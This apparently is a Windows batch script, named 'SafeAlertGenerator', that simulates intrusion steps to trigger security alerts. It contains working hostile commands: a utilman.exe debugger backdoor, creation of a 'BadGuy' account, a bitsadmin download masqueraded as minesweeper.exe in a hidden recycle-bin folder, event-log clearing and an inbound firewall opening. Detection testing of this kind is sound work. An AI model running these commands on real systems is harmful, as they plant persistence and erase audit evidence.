net group "Executives" /domain
ping -n 1 gorodkoff.com
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f
whoami
powershell -command 'Get-Item -Path "Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion"'
ipconfig
net user /add BadGuy p@ssword123
mkdir c:\$recycle.bin\S-1-5-21-8675309
start /wait bitsadmin.exe /transfer updates /download /priority normal https://www.nirsoft.net/utils/nircmd.zip C:\Users\Public\nircmd.zip
powershell -command "Expand-Archive C:\Users\Public\nircmd.zip C:\Users\Public\nircmd"
copy "c:\users\public\nircmd\nircmd.exe" "c:\$recycle.bin\S-1-5-21-8675309\minesweeper.exe"
c:\$recycle.bin\S-1-5-21-8675309\minesweeper.exe savescreenshot c:\$recycle.bin\S-1-5-21-8675309\shot1.png
wevtutil cl Application
powershell -command "New-NetFirewallRule -DisplayName MinesweeperSSH -Direction Inbound -Program "c:\users\public\nircmd\nircmd.exe" -EdgeTraversalPolicy Allow -Protocol TCP -LocalPort 22 -Action Allow"
msg * "SafeAlertGenerator batch script finished running"
